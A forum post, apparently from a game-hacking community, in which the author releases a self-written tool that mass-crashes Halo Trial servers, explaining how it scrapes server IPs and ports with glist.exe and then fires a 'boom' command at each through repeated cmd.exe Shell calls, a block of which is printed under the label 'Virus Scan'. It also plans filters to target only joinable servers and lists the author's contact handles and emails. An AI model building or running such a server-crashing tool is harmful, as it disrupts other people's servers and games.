!! I finally got it finished. For Halo Trial only. This isn't a keylogger, I provided a virus scan for you people who hold grudges... This is what the program does. NMGod made a better one but this one is mine hehe. Didn't even rip the code from him.
I use glist.exe to output all the IP's and Ports to a text file called textfile.txt. But, there is one problem. The program added a lot of spaces to make everything look even. So, I import the text file into a invisible text box on my program, I get rid of the excess spaces. Now it is just IP space Port. I then do this 65 times.* This then opens up a shitload of CMD's, booming servers. YOU MUST HAVE FAST INTERNET AND PC TO USE THIS. NEVER CLICK THE CRASH BUTTON MORE THAN 5 TIMES IN 5 5 SECONDS.
I am going to add a filter option next release, that doesn't boom servers with passwords, servers with no people (aka cant connect becaase no ports open), servers that are full. Just connectable ones.
@ funkadelik_bob:
The reason I released this, is because, it sucks. Also NMGod released his in that folder. Also, im going to make better one.
@ everybody. I HAVE THE PASSWORD FOR THE PROGRAM, PM ME TO GET IT!! LOLOLOLOL joking the pass is...
Virus Scan:
Shell("cmd.exe /C boom " & TextBox1.Lines(0))
Shell("cmd.exe /C boom " & TextBox1.Lines(1))
Shell("cmd.exe /C boom " & TextBox1.Lines(2))
Shell("cmd.exe /C boom " & TextBox1.Lines(3))
Shell("cmd.exe /C boom " & TextBox1.Lines(4))
Shell("cmd.exe /C boom " & TextBox1.Lines(5))
Shell("cmd.exe /C boom " & TextBox1.Lines(6))
Shell("cmd.exe /C boom " & TextBox1.Lines(7))
Shell("cmd.exe /C boom " & TextBox1.Lines(8))
Shell("cmd.exe /C boom " & TextBox1.Lines(9))
Shell("cmd.exe /C boom " & TextBox1.Lines(10))
Shell("cmd.exe /C boom " & TextBox1.Lines(11))
MSN : psprcule@live.com
Xfire: butcher1993
AIm: butcher1018728
Steam: same as aim
psprcule@gmail.com is email i check
imma drive my first game into da dust b4 i move this month lol